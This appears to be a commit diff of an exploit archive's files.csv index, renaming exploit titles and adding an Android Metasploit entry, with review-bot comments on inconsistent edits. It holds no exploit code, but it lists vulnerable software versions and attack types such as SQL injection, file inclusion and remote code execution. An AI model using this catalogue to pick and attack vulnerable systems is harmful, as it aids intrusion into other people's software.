DB: 2016-12-30

6 new exploits

VicFTPS < 5.0 - (CWD) Remote Buffer Overflow (PoC)
VicFTPS < 5.0 - 'CWD' Remote Buffer Overflow (PoC)

SilverSHielD 1.0.2.34 - (opendir) Denial of Service
SilverSHielD 1.0.2.34 - Denial of Service

Android - get_user/put_user Exploit (Metasploit)

LoudBlog 0.4 - (path) Arbitrary Remote File Inclusion
LoudBlog 0.4 - Arbitrary Remote File Inclusion

MyEvent 1.3 - (myevent_path) Remote File Inclusion
MyEvent 1.3 - 'event.php' Remote File Inclusion

LoudBlog 0.5 - (id) SQL Injection / Admin Credentials Disclosure
LoudBlog 0.5 - SQL Injection / Admin Credentials Disclosure

yappa-ng 2.3.1 - (admin_modules) Remote File Inclusion
Yappa-ng 2.3.1 - (admin_modules) Remote File Inclusion

PHP Easy Downloader 1.5 - (save.php) Remote Code Execution
PHP Easy Downloader 1.5 - 'save.php' Remote Code Execution

Ip Reg 0.3 - Multiple SQL Injections
IP Reg 0.3 - Multiple SQL Injections

AstroSPACES - 'id' SQL Injection
AstroSPACES 1.1.1 - 'id' Parameter SQL Injection

myEvent 1.6 - (viewevent.php) SQL Injection
myEvent 1.6 - 'eventdate' Parameter SQL Injection

Mosaic Commerce - 'category.php cid' SQL Injection
Mosaic Commerce - 'cid' Parameter SQL Injection
PokerMax Poker League - Insecure Cookie Handling
Kure 0.6.3 - (index.php post & doc) Local File Inclusion
PokerMax Poker League 0.13 - Insecure Cookie Handling
Kure 0.6.3 - 'index.php' Local File Inclusion

PHP Easy Downloader 1.5 - (file) File Disclosure
PHP Easy Downloader 1.5 - 'file' Parameter File Disclosure

Post Affiliate Pro 2.0 - (index.php md) Local File Inclusion
Post Affiliate Pro 2.0 - 'md' Parameter Local File Inclusion

XOOPS Module GesGaleri - (kategorino) SQL Injection
XOOPS Module GesGaleri - SQL Injection

zeeproperty - 'adid' SQL Injection
zeeproperty - 'adid' Parameter SQL Injection
Fast Click SQL 1.1.7 Lite - (init.php) Remote File Inclusion
yappa-ng 2.3.3-beta0 - (album) Local File Inclusion
Fast Click SQL 1.1.7 Lite - 'init.php' Remote File Inclusion
Yappa-ng 2.3.3-beta0 - 'album' Parameter Local File Inclusion
WBB Plugin rGallery 1.09 - 'itemID' Blind SQL Injection
e107 <= 0.7.13 - (usersettings.php) Blind SQL Injection
Joomla! Component ds-syndicate - (feed_id) SQL Injection
XOOPS Module makale - SQL Injection
WBB Plugin rGallery 1.09 - 'itemID' Parameter Blind SQL Injection
e107 <= 0.7.13 - 'usersettings.php' Blind SQL Injection
Joomla! Component ds-syndicate - 'feed_id' Parameter SQL Injection
XOOPS Module makale 0.26 - SQL Injection
ShopMaker 1.0 - (product.php id) SQL Injection
Joomla! Component Daily Message 1.0.3 - 'id' SQL Injection
ShopMaker CMS 1.0 - 'id' Parameter SQL Injection
Joomla! Component Daily Message 1.0.3 - 'id' Parameter SQL Injection
phpcrs 2.06 - (importFunction) Local File Inclusion
LoudBlog 0.8.0a - Authenticated (ajax.php) SQL Injection
phpcrs 2.06 - 'importFunction' Parameter Local File Inclusion
LoudBlog 0.8.0a - 'ajax.php' SQL Injection

YDC - 'kdlist.php cat' SQL Injection
YDC - 'cat' Parameter SQL Injection

txtshop 1.0b (Windows) - 'Language' Local File Inclusion
txtshop 1.0b (Windows) - 'Language' Parameter Local File Inclusion

MindDezign Photo Gallery 2.2 - (index.php id) SQL Injection
MindDezign Photo Gallery 2.2 - SQL Injection

websvn 2.0 - Cross-Site Scripting / File Handling / Code Execution
WebSVN 2.0 - Cross-Site Scripting / File Handling / Code Execution

Aj RSS Reader - 'EditUrl.php url' SQL Injection
Aj RSS Reader - 'url' Parameter SQL Injection
WordPress Plugin Media Holder - 'mediaHolder.php id' SQL Injection
SFS Ez Forum - 'forum.php id' SQL Injection
WordPress Plugin Media Holder - SQL Injection
SFS Ez Forum - SQL Injection

e107 Plugin EasyShop - (category_id) Blind SQL Injection
e107 Plugin EasyShop - 'category_id' Parameter Blind SQL Injection

Post Affiliate Pro 3 - (umprof_status) Blind SQL Injection
Post Affiliate Pro 3 - 'umprof_status' Parameter Blind SQL Injection

CafeEngine - 'index.php catid' SQL Injection
CafeEngine - 'catid' Parameter SQL Injection

shopmaker CMS 2.0 - Blind SQL Injection / Local File Inclusion
ShopMaker CMS 2.0 - Blind SQL Injection / Local File Inclusion

CafeEngine CMS 2.3 - SQL Injection
CafeEngine 2.3 - SQL Injection
Yappa-NG 1.x/2.x - Unspecified Remote File Inclusion
Yappa-NG 1.x/2.x - Unspecified Cross-Site Scripting
Yappa-ng 1.x/2.x - Unspecified Remote File Inclusion
Yappa-ng 1.x/2.x - Unspecified Cross-Site Scripting

LoudBlog 0.41 - podcast.php id Parameter SQL Injection
LoudBlog 0.41 - 'podcast.php' SQL Injection

LoudBlog 0.41 - backend_settings.php language Parameter Traversal Arbitrary File Access
LoudBlog 0.41 - 'backend_settings.php' Traversal Arbitrary File Access

Fast Click SQL Lite 1.1.2/1.1.3 - show.php Remote File Inclusion
Fast Click SQL Lite 1.1.2/1.1.3 - 'show.php' Remote File Inclusion

myEvent 1.2/1.3 - Myevent.php Remote File Inclusion
myEvent 1.2/1.3 - 'myevent.php' Remote File Inclusion
Meeting Room Booking System (MRBS) 1.2.6 - day.php area Parameter Cross-Site Scripting
Meeting Room Booking System (MRBS) 1.2.6 - week.php area Parameter Cross-Site Scripting
Meeting Room Booking System (MRBS) 1.2.6 - month.php area Parameter Cross-Site Scripting
Meeting Room Booking System (MRBS) 1.2.6 - search.php area Parameter Cross-Site Scripting
Meeting Room Booking System (MRBS) 1.2.6 - report.php area Parameter Cross-Site Scripting
Meeting Room Booking System (MRBS) 1.2.6 - help.php area Parameter Cross-Site Scripting
Meeting Room Booking System (MRBS) 1.2.6 - 'day.php' Cross-Site Scripting
Meeting Room Booking System (MRBS) 1.2.6 - 'week.php' Cross-Site Scripting
Meeting Room Booking System (MRBS) 1.2.6 - 'month.php' Cross-Site Scripting
Meeting Room Booking System (MRBS) 1.2.6 - 'search.php' Cross-Site Scripting
Meeting Room Booking System (MRBS) 1.2.6 - 'report.php' Cross-Site Scripting
Meeting Room Booking System (MRBS) 1.2.6 - 'help.php' Cross-Site Scripting
yappa-ng - 'index.php' album Parameter Cross-Site Scripting
yappa-ng - Query String Cross-Site Scripting
Yappa-ng - 'index.php' album Parameter Cross-Site Scripting
Yappa-ng - Query String Cross-Site Scripting

tinybrowser - /tiny_mce/plugins/tinybrowser/edit.php type Parameter Cross-Site Scripting
tinybrowser - /tiny_mce/plugins/tinybrowser/upload.php type Parameter Cross-Site Scripting
tinybrowser - /tiny_mce/plugins/tinybrowser/tinybrowser.php type Parameter Cross-Site Scripting
tinybrowser - /tiny_mce/plugins/tinybrowser/tinybrowser.php Empty type Parameter Directory Listing
tinybrowser - /tiny_mce/plugins/tinybrowser/edit.php Empty type Parameter Directory Listing
tinybrowser - 'type' Parameter Cross-Site Scripting
tinybrowser - 'tinybrowser.php' Directory Listing
tinybrowser - 'edit.php' Directory Listing
Joomla! Component aWeb Cart Watching System for Virtuemart 2.6.0 - SQL Injection
PHPMailer < 5.2.18 - Remote Code Execution (Python)
WordPress Plugin Slider Templatic Tevolution < 2.3.6 - Arbitrary File Upload
Dell SonicWALL Global Management System GMS 8.1 - Blind SQL Injection
Dell SonicWALL Secure Mobile Access SMA 8.1 - Cross-Site Scripting / Cross-Site Request Forgery
Offensive Security 2016-12-30 05:01:19 +00:00
parent f8746c89a4
commit 9f1fdff37d
9 changed files with 431 additions and 72 deletions

120
files.csv

@ -503,7 +503,7 @@ id,file,description,date,author,platform,type,port
3306,platforms/windows/dos/3306.pl,"MailEnable Professional/Enterprise 2.35 - Out of Bounds Denial of Service",2007-02-14,mu-b,windows,dos,0 3306,platforms/windows/dos/3306.pl,"MailEnable Professional/Enterprise 2.35 - Out of Bounds Denial of Service",2007-02-14,mu-b,windows,dos,0
3307,platforms/windows/dos/3307.html,"ActSoft DVD-Tools - 'dvdtools.ocx' Remote Buffer Overflow (PoC)",2007-02-14,shinnai,windows,dos,0 3307,platforms/windows/dos/3307.html,"ActSoft DVD-Tools - 'dvdtools.ocx' Remote Buffer Overflow (PoC)",2007-02-14,shinnai,windows,dos,0
3308,platforms/windows/dos/3308.pl,"MailEnable Professional/Enterprise 2.37 - Denial of Service",2007-02-14,mu-b,windows,dos,0 3308,platforms/windows/dos/3308.pl,"MailEnable Professional/Enterprise 2.37 - Denial of Service",2007-02-14,mu-b,windows,dos,0
3331,platforms/windows/dos/3331.c,"VicFTPS < 5.0 - (CWD) Remote Buffer Overflow (PoC)",2007-02-18,r0ut3r,windows,dos,0 3331,platforms/windows/dos/3331.c,"VicFTPS < 5.0 - 'CWD' Remote Buffer Overflow (PoC)",2007-02-18,r0ut3r,windows,dos,0
3341,platforms/windows/dos/3341.cpp,"TurboFTP Server 5.30 Build 572 - 'newline/LIST' Multiple Remote Denial of Service",2007-02-20,Marsu,windows,dos,0 3341,platforms/windows/dos/3341.cpp,"TurboFTP Server 5.30 Build 572 - 'newline/LIST' Multiple Remote Denial of Service",2007-02-20,Marsu,windows,dos,0
3343,platforms/windows/dos/3343.cpp,"FTP Voyager 14.0.0.3 - (CWD) Remote Stack Overflow (PoC)",2007-02-20,Marsu,windows,dos,0 3343,platforms/windows/dos/3343.cpp,"FTP Voyager 14.0.0.3 - (CWD) Remote Stack Overflow (PoC)",2007-02-20,Marsu,windows,dos,0
3347,platforms/windows/dos/3347.cpp,"FTP Explorer 1.0.1 Build 047 - (CPU Consumption) Remote Denial of Service",2007-02-20,Marsu,windows,dos,0 3347,platforms/windows/dos/3347.cpp,"FTP Explorer 1.0.1 Build 047 - (CPU Consumption) Remote Denial of Service",2007-02-20,Marsu,windows,dos,0
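Review bot: The requoting on row 3331 is applied to that row only, so the file now carries two spellings of the same FTP command: 3331 reads `'CWD'` while the context row 3343, two lines below, still reads `(CWD)`. Convert 3343 in the same change, otherwise a search of the description column for the quoted form finds one FTP server entry and misses the other.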
@ -838,7 +838,7 @@ id,file,description,date,author,platform,type,port
6800,platforms/windows/dos/6800.pl,"freeSSHd 1.2.1 - Authenticated SFTP rename Remote Buffer Overflow (PoC)",2008-10-22,"Jeremy Brown",windows,dos,0 6800,platforms/windows/dos/6800.pl,"freeSSHd 1.2.1 - Authenticated SFTP rename Remote Buffer Overflow (PoC)",2008-10-22,"Jeremy Brown",windows,dos,0
6805,platforms/multiple/dos/6805.txt,"LibSPF2 < 1.2.8 - DNS TXT Record Parsing Bug Heap Overflow (PoC)",2008-10-22,"Dan Kaminsky",multiple,dos,0 6805,platforms/multiple/dos/6805.txt,"LibSPF2 < 1.2.8 - DNS TXT Record Parsing Bug Heap Overflow (PoC)",2008-10-22,"Dan Kaminsky",multiple,dos,0
6812,platforms/windows/dos/6812.pl,"freeSSHd 1.2.1 - Authenticated SFTP realpath Remote Buffer Overflow (PoC)",2008-10-22,"Jeremy Brown",windows,dos,0 6812,platforms/windows/dos/6812.pl,"freeSSHd 1.2.1 - Authenticated SFTP realpath Remote Buffer Overflow (PoC)",2008-10-22,"Jeremy Brown",windows,dos,0
6815,platforms/windows/dos/6815.pl,"SilverSHielD 1.0.2.34 - (opendir) Denial of Service",2008-10-23,"Jeremy Brown",windows,dos,0 6815,platforms/windows/dos/6815.pl,"SilverSHielD 1.0.2.34 - Denial of Service",2008-10-23,"Jeremy Brown",windows,dos,0
6824,platforms/windows/dos/6824.txt,"Microsoft Windows Server - Code Execution (PoC) (MS08-067)",2008-10-23,"stephen lawler",windows,dos,0 6824,platforms/windows/dos/6824.txt,"Microsoft Windows Server - Code Execution (PoC) (MS08-067)",2008-10-23,"stephen lawler",windows,dos,0
6832,platforms/windows/dos/6832.html,"KVIrc 3.4.0 - Virgo Remote Format String (PoC)",2008-10-24,LiquidWorm,windows,dos,0 6832,platforms/windows/dos/6832.html,"KVIrc 3.4.0 - Virgo Remote Format String (PoC)",2008-10-24,LiquidWorm,windows,dos,0
6834,platforms/windows/dos/6834.c,"vicFTP 5.0 - 'LIST' Remote Denial of Service",2008-10-24,"Alfons Luja",windows,dos,0 6834,platforms/windows/dos/6834.c,"vicFTP 5.0 - 'LIST' Remote Denial of Service",2008-10-24,"Alfons Luja",windows,dos,0
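Review bot: Row 6815 loses the affected operation: `(opendir)` is deleted rather than requoted, leaving only "SilverSHielD 1.0.2.34 - Denial of Service". The freeSSHd rows in the same hunk keep theirs ("SFTP rename", "SFTP realpath"), and anyone triaging exposure by searching the description column for the operation name will no longer hit this entry. Suggest keeping it in the quoted form, `'opendir'`.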
@ -8440,6 +8440,7 @@ id,file,description,date,author,platform,type,port
38095,platforms/windows/local/38095.pl,"VeryPDF HTML Converter 2.0 - SEH/ToLower() Bypass Buffer Overflow",2015-09-07,"Robbie Corley",windows,local,0 38095,platforms/windows/local/38095.pl,"VeryPDF HTML Converter 2.0 - SEH/ToLower() Bypass Buffer Overflow",2015-09-07,"Robbie Corley",windows,local,0
38138,platforms/osx/local/38138.txt,"Apple Mac OSX - Install.framework suid Helper Privilege Escalation",2015-09-10,"Google Security Research",osx,local,0 38138,platforms/osx/local/38138.txt,"Apple Mac OSX - Install.framework suid Helper Privilege Escalation",2015-09-10,"Google Security Research",osx,local,0
38147,platforms/windows/local/38147.pl,"Logitech Webcam Software 1.1 - eReg.exe SEH/Unicode Buffer Overflow",2015-09-11,"Robbie Corley",windows,local,0 38147,platforms/windows/local/38147.pl,"Logitech Webcam Software 1.1 - eReg.exe SEH/Unicode Buffer Overflow",2015-09-11,"Robbie Corley",windows,local,0
40975,platforms/android/local/40975.rb,"Android - get_user/put_user Exploit (Metasploit)",2016-12-29,Metasploit,android,local,0
38185,platforms/windows/local/38185.txt,"Total Commander 8.52 - Overwrite (SEH) Buffer Overflow",2015-09-15,Un_N0n,windows,local,0 38185,platforms/windows/local/38185.txt,"Total Commander 8.52 - Overwrite (SEH) Buffer Overflow",2015-09-15,Un_N0n,windows,local,0
38198,platforms/windows/local/38198.txt,"Microsoft Windows 10 Build 10130 - User Mode Font Driver Thread Permissions Privilege Escalation",2015-09-15,"Google Security Research",windows,local,0 38198,platforms/windows/local/38198.txt,"Microsoft Windows 10 Build 10130 - User Mode Font Driver Thread Permissions Privilege Escalation",2015-09-15,"Google Security Research",windows,local,0
38199,platforms/windows/local/38199.txt,"Microsoft Windows - NtUserGetClipboardAccessToken Token Leak (MS15-023)",2015-09-15,"Google Security Research",windows,local,0 38199,platforms/windows/local/38199.txt,"Microsoft Windows - NtUserGetClipboardAccessToken Token Leak (MS15-023)",2015-09-15,"Google Security Research",windows,local,0
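Review bot: The added row 40975 sits between 38147 and 38185, which breaks the ascending id order that every other visible row in this hunk follows; its date, 2016-12-29, is likewise out of sequence among 2015-09 entries. If tools reading files.csv rely on the rows being sorted, place the row where its id sorts, or state the intended sort key in the commit message. The description "Android - get_user/put_user Exploit (Metasploit)" also names no vulnerability class or affected version, unlike its neighbours ("Privilege Escalation", "Token Leak"), which makes it hard to find by impact.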
@ -16028,7 +16029,7 @@ id,file,description,date,author,platform,type,port
1457,platforms/php/webapps/1457.txt,"phpBB 2.0.19 - Cross-Site Scripting Remote Cookie Disclosure",2006-01-29,threesixthousan,php,webapps,0 1457,platforms/php/webapps/1457.txt,"phpBB 2.0.19 - Cross-Site Scripting Remote Cookie Disclosure",2006-01-29,threesixthousan,php,webapps,0
1459,platforms/php/webapps/1459.pl,"xeCMS 1.0.0 RC 2 - 'cookie' Remote Command Execution",2006-01-30,cijfer,php,webapps,0 1459,platforms/php/webapps/1459.pl,"xeCMS 1.0.0 RC 2 - 'cookie' Remote Command Execution",2006-01-30,cijfer,php,webapps,0
1461,platforms/php/webapps/1461.pl,"Invision Power Board Dragoran Portal Mod 1.3 - SQL Injection",2006-01-31,SkOd,php,webapps,0 1461,platforms/php/webapps/1461.pl,"Invision Power Board Dragoran Portal Mod 1.3 - SQL Injection",2006-01-31,SkOd,php,webapps,0
1467,platforms/php/webapps/1467.php,"LoudBlog 0.4 - (path) Arbitrary Remote File Inclusion",2006-02-03,rgod,php,webapps,0 1467,platforms/php/webapps/1467.php,"LoudBlog 0.4 - Arbitrary Remote File Inclusion",2006-02-03,rgod,php,webapps,0
1468,platforms/php/webapps/1468.php,"Clever Copy 3.0 - Admin Auth Details / SQL Injection",2006-02-04,rgod,php,webapps,0 1468,platforms/php/webapps/1468.php,"Clever Copy 3.0 - Admin Auth Details / SQL Injection",2006-02-04,rgod,php,webapps,0
1469,platforms/php/webapps/1469.pl,"phpBB 2.0.19 - (Style Changer/Demo Mod) SQL Injection",2006-02-05,SkOd,php,webapps,0 1469,platforms/php/webapps/1469.pl,"phpBB 2.0.19 - (Style Changer/Demo Mod) SQL Injection",2006-02-05,SkOd,php,webapps,0
1471,platforms/cgi/webapps/1471.pl,"MyQuiz 1.01 - (PATH_INFO) Arbitrary Command Execution",2006-02-06,Hessam-x,cgi,webapps,0 1471,platforms/cgi/webapps/1471.pl,"MyQuiz 1.01 - (PATH_INFO) Arbitrary Command Execution",2006-02-06,Hessam-x,cgi,webapps,0
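Review bot: On row 1467 the parameter name is deleted, not requoted: `(path)` disappears and the title becomes "LoudBlog 0.4 - Arbitrary Remote File Inclusion". For a file inclusion entry the parameter is the detail a defender matches against request logs or filter rules, and the commit message shows other entries being rewritten to the `'md' Parameter` style rather than stripped. Suggest `'path' Parameter Arbitrary Remote File Inclusion` here.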
@ -16147,7 +16148,7 @@ id,file,description,date,author,platform,type,port
1682,platforms/php/webapps/1682.php,"Fuju News 1.0 - Authentication Bypass / SQL Injection",2006-04-16,snatcher,php,webapps,0 1682,platforms/php/webapps/1682.php,"Fuju News 1.0 - Authentication Bypass / SQL Injection",2006-04-16,snatcher,php,webapps,0
1683,platforms/php/webapps/1683.php,"Blackorpheus ClanMemberSkript 1.0 - SQL Injection",2006-04-16,snatcher,php,webapps,0 1683,platforms/php/webapps/1683.php,"Blackorpheus ClanMemberSkript 1.0 - SQL Injection",2006-04-16,snatcher,php,webapps,0
1686,platforms/php/webapps/1686.pl,"FlexBB 0.5.5 - (/inc/start.php _COOKIE) SQL Bypass Exploit",2006-04-17,Devil-00,php,webapps,0 1686,platforms/php/webapps/1686.pl,"FlexBB 0.5.5 - (/inc/start.php _COOKIE) SQL Bypass Exploit",2006-04-17,Devil-00,php,webapps,0
1687,platforms/php/webapps/1687.txt,"MyEvent 1.3 - (myevent_path) Remote File Inclusion",2006-04-17,botan,php,webapps,0 1687,platforms/php/webapps/1687.txt,"MyEvent 1.3 - 'event.php' Remote File Inclusion",2006-04-17,botan,php,webapps,0
1694,platforms/php/webapps/1694.pl,"Internet PhotoShow 1.3 - 'page' Parameter Remote File Inclusion",2006-04-18,Hessam-x,php,webapps,0 1694,platforms/php/webapps/1694.pl,"Internet PhotoShow 1.3 - 'page' Parameter Remote File Inclusion",2006-04-18,Hessam-x,php,webapps,0
1695,platforms/php/webapps/1695.pl,"PHP Net Tools 2.7.1 - Remote Code Execution",2006-04-18,FOX_MULDER,php,webapps,0 1695,platforms/php/webapps/1695.pl,"PHP Net Tools 2.7.1 - Remote Code Execution",2006-04-18,FOX_MULDER,php,webapps,0
1697,platforms/php/webapps/1697.php,"PCPIN Chat 5.0.4 - (login/language) Remote Code Execution",2006-04-19,rgod,php,webapps,0 1697,platforms/php/webapps/1697.php,"PCPIN Chat 5.0.4 - (login/language) Remote Code Execution",2006-04-19,rgod,php,webapps,0
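Review bot: Row 1687 replaces the parameter `(myevent_path)` with a file name, `'event.php'`, so the new title describes a different thing from the old one and the parameter is no longer recorded anywhere in the row. If both are known, keep both (file and parameter). The product casing is also left as "MyEvent" on this row while the commit message writes "myEvent" for the 1.2/1.3 and 1.6 entries; pick one so that a search by product name returns all of them.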
@ -16381,7 +16382,7 @@ id,file,description,date,author,platform,type,port
2036,platforms/php/webapps/2036.txt,"PHP-Post 1.0 - Cookie Modification Privilege Escalation",2006-07-18,FarhadKey,php,webapps,0 2036,platforms/php/webapps/2036.txt,"PHP-Post 1.0 - Cookie Modification Privilege Escalation",2006-07-18,FarhadKey,php,webapps,0
2046,platforms/php/webapps/2046.txt,"iManage CMS 4.0.12 - 'absolute_path' Remote File Inclusion",2006-07-20,Matdhule,php,webapps,0 2046,platforms/php/webapps/2046.txt,"iManage CMS 4.0.12 - 'absolute_path' Remote File Inclusion",2006-07-20,Matdhule,php,webapps,0
2049,platforms/php/webapps/2049.txt,"SiteDepth CMS 3.0.1 - (SD_DIR) Remote File Inclusion",2006-07-20,Aesthetico,php,webapps,0 2049,platforms/php/webapps/2049.txt,"SiteDepth CMS 3.0.1 - (SD_DIR) Remote File Inclusion",2006-07-20,Aesthetico,php,webapps,0
2050,platforms/php/webapps/2050.php,"LoudBlog 0.5 - (id) SQL Injection / Admin Credentials Disclosure",2006-07-21,rgod,php,webapps,0 2050,platforms/php/webapps/2050.php,"LoudBlog 0.5 - SQL Injection / Admin Credentials Disclosure",2006-07-21,rgod,php,webapps,0
2058,platforms/php/webapps/2058.txt,"PHP Forge 3 Beta 2 - 'cfg_racine' Parameter Remote File Inclusion",2006-07-22,"Virangar Security",php,webapps,0 2058,platforms/php/webapps/2058.txt,"PHP Forge 3 Beta 2 - 'cfg_racine' Parameter Remote File Inclusion",2006-07-22,"Virangar Security",php,webapps,0
2060,platforms/php/webapps/2060.txt,"PHP Live! 3.2.1 - 'help.php' Remote File Inclusion",2006-07-23,magnific,php,webapps,0 2060,platforms/php/webapps/2060.txt,"PHP Live! 3.2.1 - 'help.php' Remote File Inclusion",2006-07-23,magnific,php,webapps,0
2062,platforms/php/webapps/2062.txt,"Mambo Component MoSpray 18RC1 - Remote File Inclusion",2006-07-23,"Kurdish Security",php,webapps,0 2062,platforms/php/webapps/2062.txt,"Mambo Component MoSpray 18RC1 - Remote File Inclusion",2006-07-23,"Kurdish Security",php,webapps,0
@ -16553,7 +16554,7 @@ id,file,description,date,author,platform,type,port
2289,platforms/php/webapps/2289.pl,"Annuaire 1Two 2.2 - SQL Injection",2006-09-02,DarkFig,php,webapps,0 2289,platforms/php/webapps/2289.pl,"Annuaire 1Two 2.2 - SQL Injection",2006-09-02,DarkFig,php,webapps,0
2290,platforms/php/webapps/2290.txt,"Dyncms Release 6 - (x_admindir) Remote File Inclusion",2006-09-02,SHiKaA,php,webapps,0 2290,platforms/php/webapps/2290.txt,"Dyncms Release 6 - (x_admindir) Remote File Inclusion",2006-09-02,SHiKaA,php,webapps,0
2291,platforms/php/webapps/2291.php,"PmWiki 2.1.19 - (Zend_Hash_Del_Key_Or_Index) Remote Exploit",2006-09-03,rgod,php,webapps,0 2291,platforms/php/webapps/2291.php,"PmWiki 2.1.19 - (Zend_Hash_Del_Key_Or_Index) Remote Exploit",2006-09-03,rgod,php,webapps,0
2292,platforms/php/webapps/2292.txt,"yappa-ng 2.3.1 - (admin_modules) Remote File Inclusion",2006-09-03,SHiKaA,php,webapps,0 2292,platforms/php/webapps/2292.txt,"Yappa-ng 2.3.1 - (admin_modules) Remote File Inclusion",2006-09-03,SHiKaA,php,webapps,0
2293,platforms/php/webapps/2293.txt,"FlashChat 4.5.7 - (aedating4CMS.php) Remote File Inclusion",2006-09-04,NeXtMaN,php,webapps,0 2293,platforms/php/webapps/2293.txt,"FlashChat 4.5.7 - (aedating4CMS.php) Remote File Inclusion",2006-09-04,NeXtMaN,php,webapps,0
2294,platforms/asp/webapps/2294.txt,"Muratsoft Haber Portal 3.6 - (tr) SQL Injection",2006-09-03,ASIANEAGLE,asp,webapps,0 2294,platforms/asp/webapps/2294.txt,"Muratsoft Haber Portal 3.6 - (tr) SQL Injection",2006-09-03,ASIANEAGLE,asp,webapps,0
2295,platforms/php/webapps/2295.txt,"In-link 2.3.4 - (ADODB_DIR) Remote File Inclusion",2006-09-04,"Saudi Hackrz",php,webapps,0 2295,platforms/php/webapps/2295.txt,"In-link 2.3.4 - (ADODB_DIR) Remote File Inclusion",2006-09-04,"Saudi Hackrz",php,webapps,0
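Review bot: Row 2292 is only half normalised: the product name changes from "yappa-ng" to "Yappa-ng" but `(admin_modules)` stays in parentheses, while the commit message shows the Yappa-ng 2.3.3-beta0 entry being rewritten to `'album' Parameter`. Quote `admin_modules` the same way in this change, adding "Parameter" only if that is what it is, so the two Yappa-ng file inclusion titles follow one convention.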
@ -16964,7 +16965,7 @@ id,file,description,date,author,platform,type,port
2808,platforms/php/webapps/2808.txt,"Dicshunary 0.1a - (check_status.php) Remote File Inclusion",2006-11-17,DeltahackingTEAM,php,webapps,0 2808,platforms/php/webapps/2808.txt,"Dicshunary 0.1a - (check_status.php) Remote File Inclusion",2006-11-17,DeltahackingTEAM,php,webapps,0
2810,platforms/php/webapps/2810.php,"Oxygen 1.1.3 (O2PHP Bulletin Board) - SQL Injection",2006-11-18,DarkFig,php,webapps,0 2810,platforms/php/webapps/2810.php,"Oxygen 1.1.3 (O2PHP Bulletin Board) - SQL Injection",2006-11-18,DarkFig,php,webapps,0
2811,platforms/php/webapps/2811.txt,"PHPWebThings 1.5.2 - (editor.php) Remote File Inclusion",2006-11-18,nuffsaid,php,webapps,0 2811,platforms/php/webapps/2811.txt,"PHPWebThings 1.5.2 - (editor.php) Remote File Inclusion",2006-11-18,nuffsaid,php,webapps,0
2812,platforms/php/webapps/2812.pl,"PHP Easy Downloader 1.5 - (save.php) Remote Code Execution",2006-11-18,nuffsaid,php,webapps,0 2812,platforms/php/webapps/2812.pl,"PHP Easy Downloader 1.5 - 'save.php' Remote Code Execution",2006-11-18,nuffsaid,php,webapps,0
2813,platforms/asp/webapps/2813.txt,"ASPNuke 0.80 - (register.asp) SQL Injection",2006-11-19,ajann,asp,webapps,0 2813,platforms/asp/webapps/2813.txt,"ASPNuke 0.80 - (register.asp) SQL Injection",2006-11-19,ajann,asp,webapps,0
2814,platforms/php/webapps/2814.txt,"PHPQuickGallery 1.9 - (textFile) Remote File Inclusion",2006-11-19,"Al7ejaz Hacker",php,webapps,0 2814,platforms/php/webapps/2814.txt,"PHPQuickGallery 1.9 - (textFile) Remote File Inclusion",2006-11-19,"Al7ejaz Hacker",php,webapps,0
2817,platforms/php/webapps/2817.txt,"Photo Cart 3.9 - (adminprint.php) Remote File Inclusion",2006-11-21,irvian,php,webapps,0 2817,platforms/php/webapps/2817.txt,"Photo Cart 3.9 - (adminprint.php) Remote File Inclusion",2006-11-21,irvian,php,webapps,0
@ -18172,7 +18173,7 @@ id,file,description,date,author,platform,type,port
4768,platforms/php/webapps/4768.py,"Shadowed Portal 5.7d3 - Remote Command Execution",2007-12-21,The:Paradox,php,webapps,0 4768,platforms/php/webapps/4768.py,"Shadowed Portal 5.7d3 - Remote Command Execution",2007-12-21,The:Paradox,php,webapps,0
4769,platforms/php/webapps/4769.txt,"Shadowed Portal 5.7d3 - (POST) Remote File Inclusion",2007-12-21,The:Paradox,php,webapps,0 4769,platforms/php/webapps/4769.txt,"Shadowed Portal 5.7d3 - (POST) Remote File Inclusion",2007-12-21,The:Paradox,php,webapps,0
4770,platforms/php/webapps/4770.txt,"Wallpaper Site 1.0.09 - (category.php) SQL Injection",2007-12-22,Koller,php,webapps,0 4770,platforms/php/webapps/4770.txt,"Wallpaper Site 1.0.09 - (category.php) SQL Injection",2007-12-22,Koller,php,webapps,0
4771,platforms/php/webapps/4771.txt,"Ip Reg 0.3 - Multiple SQL Injections",2007-12-22,MhZ91,php,webapps,0 4771,platforms/php/webapps/4771.txt,"IP Reg 0.3 - Multiple SQL Injections",2007-12-22,MhZ91,php,webapps,0
4772,platforms/php/webapps/4772.txt,"zBlog 1.2 - SQL Injection",2007-12-22,Houssamix,php,webapps,0 4772,platforms/php/webapps/4772.txt,"zBlog 1.2 - SQL Injection",2007-12-22,Houssamix,php,webapps,0
4774,platforms/php/webapps/4774.pl,"PHP ZLink 0.3 - (go.php) SQL Injection",2007-12-23,DNX,php,webapps,0 4774,platforms/php/webapps/4774.pl,"PHP ZLink 0.3 - (go.php) SQL Injection",2007-12-23,DNX,php,webapps,0
4775,platforms/php/webapps/4775.txt,"Adult Script 1.6.5 - Multiple SQL Injections",2007-12-23,MhZ91,php,webapps,0 4775,platforms/php/webapps/4775.txt,"Adult Script 1.6.5 - Multiple SQL Injections",2007-12-23,MhZ91,php,webapps,0
@ -19682,65 +19683,65 @@ id,file,description,date,author,platform,type,port
6751,platforms/php/webapps/6751.txt,"SezHoo 0.1 - Remote File Inclusion",2008-10-14,DaRkLiFe,php,webapps,0 6751,platforms/php/webapps/6751.txt,"SezHoo 0.1 - Remote File Inclusion",2008-10-14,DaRkLiFe,php,webapps,0
6754,platforms/php/webapps/6754.txt,"My PHP Dating - 'id' Parameter SQL Injection",2008-10-14,Hakxer,php,webapps,0 6754,platforms/php/webapps/6754.txt,"My PHP Dating - 'id' Parameter SQL Injection",2008-10-14,Hakxer,php,webapps,0
6755,platforms/php/webapps/6755.php,"PHPWebGallery 1.7.2 - Session Hijacking / Code Execution",2008-10-14,EgiX,php,webapps,0 6755,platforms/php/webapps/6755.php,"PHPWebGallery 1.7.2 - Session Hijacking / Code Execution",2008-10-14,EgiX,php,webapps,0
6758,platforms/php/webapps/6758.txt,"AstroSPACES - 'id' SQL Injection",2008-10-15,TurkishWarriorr,php,webapps,0 6758,platforms/php/webapps/6758.txt,"AstroSPACES 1.1.1 - 'id' Parameter SQL Injection",2008-10-15,TurkishWarriorr,php,webapps,0
6759,platforms/php/webapps/6759.txt,"mystats - 'hits.php' Multiple Vulnerabilities",2008-10-15,JosS,php,webapps,0 6759,platforms/php/webapps/6759.txt,"mystats - 'hits.php' Multiple Vulnerabilities",2008-10-15,JosS,php,webapps,0
